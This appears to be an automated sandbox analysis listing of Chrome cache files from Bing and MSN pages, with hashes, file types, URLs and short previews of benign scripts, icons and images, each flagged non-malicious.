                                                                                                                                                                                                                                                                        SHA-256:AE57256091E86B729C7D6E575DF6C005FAF49B50036E32B63BDF07E5DBAA4B40
                                                                                                                                                                                                                                                                        SHA-512:FD938D5B5F055CE0E585922AF1D349AC0D4A1104EA890A871B681633548A9CA80F12C3A7A430D9D3253A465A74EF648CD71FEACCAABBDCF99275EEF1747B73CE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+......IDATx......Q...C32!..JbC....d..\.\....Z....RJ,..;.7`.._..;.|g.1...`.w.A.......8.E.2.....=-.E....>..*.(b....b.....9A.z.Kt..U.....8. P@.-(HS<.C...%h...EM.g].D.B....*..K...}....C....+|TJ.T?.....,{........IEND.B`..........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5983), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):5983
                                                                                                                                                                                                                                                                        Entropy (8bit):5.2825366147372455
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:kiz62PGRHEKnpA7Yc33HxTVwXKRsVNS6cvPOZWVjJnxdSwxxtR2EA8SOsDquOj:kie+GRHFnaLNjXOZWRYwxN2EANOsDqum
                                                                                                                                                                                                                                                                        MD5:785D3C1D93D18E5478F0C3FFCE35CD03
                                                                                                                                                                                                                                                                        SHA1:1F7533428AF383A196CC2319477B762F86500514
                                                                                                                                                                                                                                                                        SHA-256:B32B54F6D1BE64DF456502B677407D4CFA5F10E98CDE9350D9E63331FDBB7BFC
                                                                                                                                                                                                                                                                        SHA-512:F374DED54893E2CC95D2F8BAE4C7896F9CB4BC21E0C53B773D31F90E6D940C6ADB8552130D210D4BD43AB69EC25BCD64887660581DC5FC454C634C4E7B6037D7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/H3UzQorzg6GWzCMZR3t2L4ZQBRQ.js
                                                                                                                                                                                                                                                                        Preview:var Feedback;(function(n){var t;(function(t){function u(t,r,u,f,e,o){t=typeof t===i?!1:t;t&&scrollTo(0,0);u=typeof u===i?!0:u;n.PackageLoad.Load(r,u,f,e,o)}function o(n,t){for(var r=0,i=null;n&&n.getAttribute&&(!(t>=1)||r<t);){if(i=n.getAttribute("data-fbhlsel"),i!=null)break;r++;n=n.parentNode}return i}function a(t,a,v,y,p,w,b,k,d){function ot(t){var r=null,i;return t&&(i=new c,n.fel("ajax.feedback.collectsettings","gsf",i),r=i.findSettings(t)),r}var it,tt,nt,et,rt,g,ut,ft;(sj_cook&&(tt=sj_cook.get("fdbk_acc","tabfocus"),tt&&(nt=_ge(tt),nt?(nt.focus(),sj_cook.clear("fdbk_acc","/")):(nt=document.querySelector('[id^="'+tt+'"]'),nt?(nt.focus(),sj_cook.clear("fdbk_acc","/")):(et=tt.indexOf("thumb_f")!=-1&&a.indexOf("thumb_f")!=-1||tt.indexOf("thumb_t")!=-1&&a.indexOf("thumb_t")!=-1,et&&(nt=_ge(a),rt=(it=nt===null||nt===void 0?void 0:nt.parentElement)===null||it===void 0?void 0:it.parentElement,rt&&rt.classList.contains("l_ecrd_tud")&&(nt.focus(),sj_cook.clear("fdbk_acc","/"))))))),g=_ge(a
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (391), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):391
                                                                                                                                                                                                                                                                        Entropy (8bit):5.184440623275194
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:2Qxjl/mLAHPWEaaGRHkj6iLUEkFKgs5qHT:2QC8H+aGRHk+i1kFKgs5qHT
                                                                                                                                                                                                                                                                        MD5:55EC2297C0CF262C5FA9332F97C1B77A
                                                                                                                                                                                                                                                                        SHA1:92640E3D0A7CBE5D47BC8F0F7CC9362E82489D23
                                                                                                                                                                                                                                                                        SHA-256:342C3DD52A8A456F53093671D8D91F7AF5B3299D72D60EDB28E4F506368C6467
                                                                                                                                                                                                                                                                        SHA-512:D070B9C415298A0F25234D1D7EAFB8BAE0D709590D3C806FCEAEC6631FDA37DFFCA40F785C86C4655AA075522E804B79A7843C647F1E98D97CCE599336DD9D59
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:(function(){function n(){var n=_ge("id_p"),t,i;n&&(t="",i="",n.dataset?(t=n.dataset.src,i=n.dataset.alt):(t=n.getAttribute("data-src"),i=n.getAttribute("data-alt")),t&&t!=""&&(n.onerror=function(){n.onerror=null;n.src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNgYAAAAAMAASsJTYQAAAAASUVORK5CYII=";n.alt=""},n.onload=function(){n.alt=i},n.src=t))}n()})()
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (426), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):426
                                                                                                                                                                                                                                                                        Entropy (8bit):4.904019517984965
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:2gcmRRt9Y4LF1Zd4XV4LFUXCdg/qUWYzP++xAQI:2gcmRRFfgiUb6MAj
                                                                                                                                                                                                                                                                        MD5:857A0DE0BBF14F3427A1AFA5CD985BCE
                                                                                                                                                                                                                                                                        SHA1:0C1D2E767F07E5C0F14EA64980DB213D379CC6F7
                                                                                                                                                                                                                                                                        SHA-256:3ED65F33193430C0B9DB61FFE7F5FE27B29F86A28563992C3AFC47D4C22C23D7
                                                                                                                                                                                                                                                                        SHA-512:E7F2603855A16464417B772517676F080CCEFFB8069C687BAC798B7EB2875FCDC207E40E8C56E7CFFD4D56CED572270988599D1D2B73FB8AAA7FDD076FE3E7B7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:(function(n){function i(){var i=document.documentElement,r=document.body,u="innerWidth"in window?window.innerWidth:i.clientWidth,f="innerHeight"in window?window.innerHeight:i.clientHeight,e=window.pageXOffset||i.scrollLeft,o=window.pageYOffset||i.scrollTop,s=document.visibilityState||"default";n.enqueue(t,{x:e,y:o,w:u,h:f,dw:r.clientWidth,dh:r.clientHeight,v:s})}var t="V";n.wireup(t,{load:null,compute:i,unload:null})})(BM)
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2913
                                                                                                                                                                                                                                                                        Entropy (8bit):5.210753142735573
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:TS9ldcFHMDcldcFHMDMLgldcFHMDMLO3RlpH//LwgZFLZq2LSHtRjVMHtnhw9MHh:wdcFU2dcFUtdcFUJI1SngMV
                                                                                                                                                                                                                                                                        MD5:149EE3CBE1BE0EE49920FDAD16764415
                                                                                                                                                                                                                                                                        SHA1:B1D49A73FCD0C3980B32F3C8EB5C4A9855923F57
                                                                                                                                                                                                                                                                        SHA-256:3D6C8EFB4E185EBD336CF879F8147B74A4DC41D142C8CEB973D676DCA180DE04
                                                                                                                                                                                                                                                                        SHA-512:4524F0BDB1FBFD9C2147FA7BA286234BD73A84CCD74CC94B6D1E087F0F03497460CE2BDEB1CA5237777C90286EC2CFBC36E1EAC96248BABE4C948053D1A6B371
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<svg width="72" height="72" viewBox="0 0 72 72" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M13.5 58H34.5H36H55.5C64.6127 58 72 50.6127 72 41.5C72 32.3873 64.6127 25 55.5 25C55.1382 25 54.7791 25.0116 54.4231 25.0346C50.6566 17.879 43.1481 13 34.5 13C23.6003 13 14.5107 20.7504 12.4418 31.0409C5.48057 31.5806 0 37.4003 0 44.5C0 51.9558 6.04416 58 13.5 58Z" fill="#E7F1FF"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M13.5 58H34.5H36H55.5C64.6127 58 72 50.6127 72 41.5C72 32.3873 64.6127 25 55.5 25C55.1382 25 54.7791 25.0116 54.4231 25.0346C50.6566 17.879 43.1481 13 34.5 13C23.6003 13 14.5107 20.7504 12.4418 31.0409C5.48057 31.5806 0 37.4003 0 44.5C0 51.9558 6.04416 58 13.5 58Z" fill="url(#paint0_linear_582_42049)"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M13.5 58H34.5H36H55.5C64.6127 58 72 50.6127 72 41.5C72 32.3873 64.6127 25 55.5 25C55.1382 25 54.7791 25.0116 54.4231 25.0346C50.6566 17.879 43.1481 13 34.5 13C23.6003 13
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):581
                                                                                                                                                                                                                                                                        Entropy (8bit):4.460231157732567
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:trZvnltuIvsbhdMLPI7eoxnoFWlW9iVSLS0EwNL4RKFz:tVvnjuRuTUCd9iP7wNLuKFz
                                                                                                                                                                                                                                                                        MD5:C86E4BDE4AF4415501A5E317ED8E28CD
                                                                                                                                                                                                                                                                        SHA1:B89F766A58D8F3EA9F794636FC147E85AA4428E2
                                                                                                                                                                                                                                                                        SHA-256:93F814F19D1E28C1B94F11A1B17754FAF4776B910BA693593490FE220B389AA1
                                                                                                                                                                                                                                                                        SHA-512:807E5FECF4CA2F8C941F6E63805037C41DA02118F63C80129EC777634E2B063B407E92C2870107EE47130F27CF71509D726E1474556FDEB070D1E887178457C1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/rp/uJ92aljY8-qfeUY2_BR-hapEKOI.svg
                                                                                                                                                                                                                                                                        Preview:<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M5.99998 3V6.68895C5.99998 7.13159 5.88246 7.56629 5.65943 7.94863L5.04612 9H10.9538L10.3405 7.94863C10.1175 7.56629 9.99998 7.13159 9.99998 6.68895V3H10.5C10.7761 3 11 2.77614 11 2.5C11 2.22386 10.7761 2 10.5 2H5.49997C5.22383 2 4.99997 2.22386 4.99997 2.5C4.99997 2.77614 5.22383 3 5.49997 3H5.99998ZM11.5372 10H4.46278L3.44536 11.7441C2.86203 12.7441 3.58334 13.9999 4.74103 13.9999H11.2589C12.4166 13.9999 13.1379 12.7441 12.5546 11.7441L11.5372 10Z" fill="#767676"/></svg>
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):30124
                                                                                                                                                                                                                                                                        Entropy (8bit):7.963662505905781
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:eM4Bin1ArpKclB0CZRzWn2ui9/xjVJv+TzTrh:eM4qAVKQi+RzicVxj+TN
                                                                                                                                                                                                                                                                        MD5:9ACA1DA3F7335D891B44E4AA6540D0C6
                                                                                                                                                                                                                                                                        SHA1:F503708EFEC5FAB3F97986268B1DC5A84107320B
                                                                                                                                                                                                                                                                        SHA-256:BF05A9E8318C04E898DEA10EE8ACF896B87609ED3472DF78BB18F15159CB2DD9
                                                                                                                                                                                                                                                                        SHA-512:CA2E72716998D7B8279A56F4A340628D9612D7B4389DCE6CA47711DC7402DC5D4A4057A7B5ACD3BF617BEB268B2065F700BBA0B023DC21CF3F38EAB78FCFC473
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...v#......i.&.....<.~.eop...Y..<1L..#gBB.1.T..3Z..I..../.hR^..#k..i....l.v..FXc*.s.....Iu<.cS...m'.V.........|'.../=...!c.$..y....Uh..7.^..sH.U.gm{..z>.kx.%...,S.r....R:.pj."..A.jv9W...w..<7.X.......6...'.x.n..?enr..y.x?{...C.iz&...j.......m%.....Gv......"..r..#..T......be.)r....:yn"..\..[e.H.Vi..;VP.g.$...$..5...:v.=..Vo...u.>...W..5...L..R..Y.zRe.*..u..L.A[
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1624
                                                                                                                                                                                                                                                                        Entropy (8bit):4.773562716145102
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:ko6ep61GB008wgl/oyBmKXCdUYAQhYzQe:lHLvVg/oyBmdHAQ
                                                                                                                                                                                                                                                                        MD5:EBAA114857D4BA27C1E02CA510B7AA7A
                                                                                                                                                                                                                                                                        SHA1:DD4A102A4556A090233348BFE9334BCB6C947EE0
                                                                                                                                                                                                                                                                        SHA-256:0B83BBA98B4FB994F34C52EA7D42CB081AB93E663180662EFCD396A9CDD09CDA
                                                                                                                                                                                                                                                                        SHA-512:0BD3F45EC580E2037D09A81106EDCBDA5EA38CD7F58573E68A074F79BADBFEC3C2554A2193E82C66ED1E64248DA6001ABF6D60C8A45180088F4082E8817183C7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBERG9W.img?w=16&h=16&q=100&m=6&f=png&u=t
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+......IDATx.]S[HTQ.]..;wf.........1...#$*.@HQ{|....H.E...G..)APB?.OA.i..!......4..5...G......}............%U.u...<#.... .M...1a..`F.....c-....b........\...M.....~...XZ...].....(.cm.LQZ..QH..E....,.Q.|.|.u.61.)3..X`..G`h*..].5.C......fy...ge..R..d... ..."/.`n..0.@.].....&.C...s9....N...M..C...&C......+g.a.....,.....ig.B..0..`)^..MfI.Jcq.....:.kc...a.-...O..y..rC...c....52.d...3..].CB.a.|.,=....SP........0T......X.Hq......?.>?....P..M.._..S`...B\XS.X...A7L..iD_.C9.3.c^."/.X.;De:...@.......@LV39..E..[.".R.&h.H.d..Ji%,U.PGF.?...4.x-............s....o.l..a)..&...vD.>.Y..w.4..i.{...QR%...wp\.....D.~@..]D...V3..<...:;l.H.f...M/..R.fD..b.k+..C..L....l.W.M6 ... .d..]....|...jvG..BWJ<0?....... D.zZ..#.'i...c.Y7.iO.....(&..+../Ni.q....IEND.B`.............................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x304, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1750
                                                                                                                                                                                                                                                                        Entropy (8bit):7.136110936757293
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:fIihitYJ/jWdE2XsQvGYCU1Y72Xdmq50tbrFl20MVq4OSLw:AiH/j0EisV9UNXdfifKf7Lw
                                                                                                                                                                                                                                                                        MD5:9119C1A6EA63AFA55E6274B55B458817
                                                                                                                                                                                                                                                                        SHA1:618102DB60F79261B94845EA3F65895EF6995AFD
                                                                                                                                                                                                                                                                        SHA-256:0FA50A450106430FB653E3EC832D8E0361F08B88FA32FC7A3F8C148755210B9B
                                                                                                                                                                                                                                                                        SHA-512:504E036FF7DDB00E2B784B68EC3C2C01635B003690FB8D6554BA269A65E07BE49D18C47E16328B3817185B6CB55DF2F1B943611F30B44C4DA2408BDE1DA41915
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/weathermapdata/1/static/background/v2.0/jpg/cloudy_2.jpg
                                                                                                                                                                                                                                                                        Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............0.,.."..........c...............................................!.1..A"..........................................1............?..~.......{.o][...+....@m.=]Q.Zr..cQ.[.GX.r..A.V.q..A.V..V.GiZ..V.....VG.t.=..v=S....+.;.W^l.]yy..>W.LW...O...{.n.V=...]t.N=1[....o..fc.k..>Q....1..=.H...^..~_..>..<.....+7.....42.Z....1....J.k..V.r..Du..rPv..\5.A.a:r.Tw.~N:..G=c..{q..X........#.mu...o;..O..d......~]}1....<...{...].g.^o.....`.=.z.+H...)..=.cL.}[......Y..X.4.....i.ADh.b7".my....M5y..]kX..u.Pt.X.F.....|...zg..>o=..@..\._....S.....k<..`?C}5.g....mz.S....}H.{..s.....1zy..'].(.k.....{c...G..#.ww...:....5....d....LGH..a...r..).&.rGH.J*..du......Q.]s]..0h:i........;.9h5z^zs.../K-z..$|.z..V.=..W.N...c.v...o...M...i.q..A..'.V/[.....iU......Z........+r.kr...k.....*.......... .`............[....
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (561), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):561
                                                                                                                                                                                                                                                                        Entropy (8bit):4.889905545792464
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:kdXCJAUQcnGfiLQGW3lfbs4HbrdE6/Wj5sSxE6fYXChX0d9JAjU:8CJWcujo47renmSSWYMy9JyU
                                                                                                                                                                                                                                                                        MD5:6D69808BC13425DCFBCD61C2DCD11305
                                                                                                                                                                                                                                                                        SHA1:76CCC14A62EDF6E44901A237B3460E22874B6F53
                                                                                                                                                                                                                                                                        SHA-256:88D86FE4AD7534BB5D79D6CEAFDC527ADE975D07F49A856CE0EE6783161516C3
                                                                                                                                                                                                                                                                        SHA-512:FCD132A1D6C53B897FA9B60DE7A054CD429DF3EAEB19F40367968FCDDE12B270C71685D6F8991A1F0A12BE14F981FD6BFADE30F43E4C9527313F978EFD87C215
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/dszBSmLt9uRJAaI3s0YOIodLb1M.js
                                                                                                                                                                                                                                                                        Preview:var OutlinePolyfil=function(){function n(){var n=this;this.attachHandlers=function(){addEventListener("keydown",n.onTabKey);addEventListener("focusin",n.onFocusIn);addEventListener("mousedown",n.onMouseDown)};this.onTabKey=function(n){n.key=="Tab"&&document.body.classList.add("tabbing")};this.onFocusIn=function(t){t.target===n.firstFocusable&&document.body.classList.add("tabbing")};this.onMouseDown=function(){document.body.classList.remove("tabbing")};this.firstFocusable=document.querySelector("#bLogo");this.attachHandlers()}return n}();new OutlinePolyfil
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1212
                                                                                                                                                                                                                                                                        Entropy (8bit):4.746571054177901
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7hJp8IkCuF6aDUSFPVKkT/qUn9WIlwKILyhFCHvjXabkJiwypN4:SpWLzp1A0wKILyhoHvrvXAN
                                                                                                                                                                                                                                                                        MD5:37CF855C1E1C773C05DFAE6D323C0978
                                                                                                                                                                                                                                                                        SHA1:FC2D73558B5A03C5CE0084BA0B70767A1773C728
                                                                                                                                                                                                                                                                        SHA-256:990A8A1556EEBE54E3730A3C84B390FD2DAD626CA7A54DA6A7F138F92527E9A8
                                                                                                                                                                                                                                                                        SHA-512:C02F5B70F5D1BA90DC14A8155DC2956D60297930E6E34F50295F6ACD84671FA2E78CDEFDD730B271916D49F8C1A49C69962030C84BB4BAB72714BFE328A66BFF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA12I8qo.img?w=16&h=16&q=100&m=6&f=png&u=t
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+..... IDATx..SMHTQ.....y>..j...d..v.B.{!7.+.%..Q.j$....Em.D.VA....I....ZL.j.......9..<.aZu......}..s.~.JK..Y17. ....G@8.-..}.\.1:N.6`.....l....yR...,...hYp.{ .[.....(...D...|.g..4<.'...!.S......&`.?..7.c{&.a.P...}......c..... .....E..!q...kV..2.M..N..2.........X..P.s.v.9.G:P".c..1.".;..*..+&R..M..f." ..d..d_g.....~..:.7.....W..o. v.....O..........>.:.....'..a...H^.h^...";..Ab........QU.zb...4...3.U.0Z[.^....)..G.';......*...0;.q...N.y.0..y.F...Q.............C.X............kl..Pfm.?...n}.*..v.[..E.\..Q.........4@uYh... .....e)...._i..[r..?....IEND.B`...........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:V:V
                                                                                                                                                                                                                                                                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                                                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                                                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                                                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/tlifxqsNyCzxIJnRwtQKuZToQQw.js
                                                                                                                                                                                                                                                                        Preview:0
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1547
                                                                                                                                                                                                                                                                        Entropy (8bit):4.5002812368789336
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:tBJluJMHMMV709HTMMrgCyDrGpsgsxPSBAs3b0PzlUVZFAHo38xAIUr4zYY3BArF:5/YbysuxPSdupG48ayP
                                                                                                                                                                                                                                                                        MD5:3AC9F8594F02FB302D7C05C7F64C3EA4
                                                                                                                                                                                                                                                                        SHA1:EFEEA55DE6C48BAD79D0AAAE1A954B19D5A14571
                                                                                                                                                                                                                                                                        SHA-256:EEF71DA25F01CC0B83539CECD5320B5717A10F441F82754DA23E6082083A86B9
                                                                                                                                                                                                                                                                        SHA-512:35A42CF8F6B57C95328EBD27A49C9CC0FDD158A329E46C61E3C7C07A218D001A964AF3D66506BFCA889754A0D47742615B731DB3110DBDDB6F3B33594A7AFFF1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/7-6lXebEi6150KquGpVLGdWhRXE.svg
                                                                                                                                                                                                                                                                        Preview:<svg width="30" height="14" viewBox="0 0 30 14" fill="none" xmlns="http://www.w3.org/2000/svg">.. <g clip-path="url(#clip0_1_504)">.. <path fill-rule="evenodd" clip-rule="evenodd" d="M7.39998 12.8H14.2L17.3 1.20001H7.39998C4.19998 1.20001 1.59998 3.80001 1.59998 7.00001C1.59998 10.2 4.19998 12.8 7.39998 12.8Z" fill="white"/>.. <path fill-rule="evenodd" clip-rule="evenodd" d="M22.6 0H7.40002C3.50002 0 0.400024 3.1 0.400024 7C0.400024 10.9 3.50002 14 7.40002 14H22.6C26.5 14 29.6 10.9 29.6 7C29.6 3.1 26.4 0 22.6 0ZM1.60002 7C1.60002 3.8 4.20002 1.2 7.40002 1.2H17.3L14.2 12.8H7.40002C4.20002 12.8 1.60002 10.2 1.60002 7Z" fill="#0066FF"/>.. <path d="M24.6 4.00001C24.8 4.20001 24.8 4.60001 24.6 4.80001L22.5 7.00001L24.7 9.20001C24.9 9.40001 24.9 9.80001 24.7 10C24.5 10.2 24.1 10.2 23.9 10L21.7 7.80001L19.5 10C19.3 10.2 18.9 10.2 18.7 10C18.5 9.80001 18.5 9.40001 18.7 9.20001L20.8 7.00001L18.6 4.80001C18.4 4.60001 18.4 4.20001 18.6 4.00001C18.8 3.80001 19.2 3.80001 19.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1286
                                                                                                                                                                                                                                                                        Entropy (8bit):4.773989693534619
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7ca/f35DANXCShEDELHjiQEsq1zjUPEYCjJfhqEA/EL+qhE5y5Pc1Z:XaX38kDyiQEsq1zXtthG/aE5yd
                                                                                                                                                                                                                                                                        MD5:0CD18720313EC21B2B899D2F4A8A9602
                                                                                                                                                                                                                                                                        SHA1:685F722E55CE3AEBABA71DE8BC4467BC9D5EA3A1
                                                                                                                                                                                                                                                                        SHA-256:CA2E862C45CC7243EEB1DB4985E24E6F832E931849F969BC32A68301AACFAE8F
                                                                                                                                                                                                                                                                        SHA-512:DCEE1F1EAC013892EAAD239903A57B395487607FD249D572DFAC25006202CDF0D50B407317B9266BBE53EA038AAE1993E18B987FDE18DD7692571F6BECDA6B85
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAywGC0.img?w=16&h=16&q=100&m=6&f=png&u=t
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+.....EIDATx....K.Q....mt.f..8.x.6I`+.......-.@".BA.Ve..V-.Z.....". ...h.E.L.,+Mgr.....j;}p8..}......E..@X..o..*V..........A....|F....^)....kmr.1.....IAE.MvY....@..V.v..qp..8..S3.o..xz.......Tnl'.....e..........?@]o?.W.I......@s..7G.u.b..}B....D.......N..{..;........k..%U.."4..AU.../.a..]..;h.z...P......-....F....i,...V..^]%.WSrR.I.....C>..%....(...R3/qD.I.........[..[..>nu._....Di.?....{.......uA...uk!9.....\..x.xJ........}.I..c~....i._.?J....W.........GT.C....6...=[..c.&.{.?.l"/.K...@..R.S... K.8J0^.%4.D..y@k.<NH.2^.H..41.0..|..~1bj.......r.a*<&.........'>..$....IEND.B`......................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:V:V
                                                                                                                                                                                                                                                                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                                                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
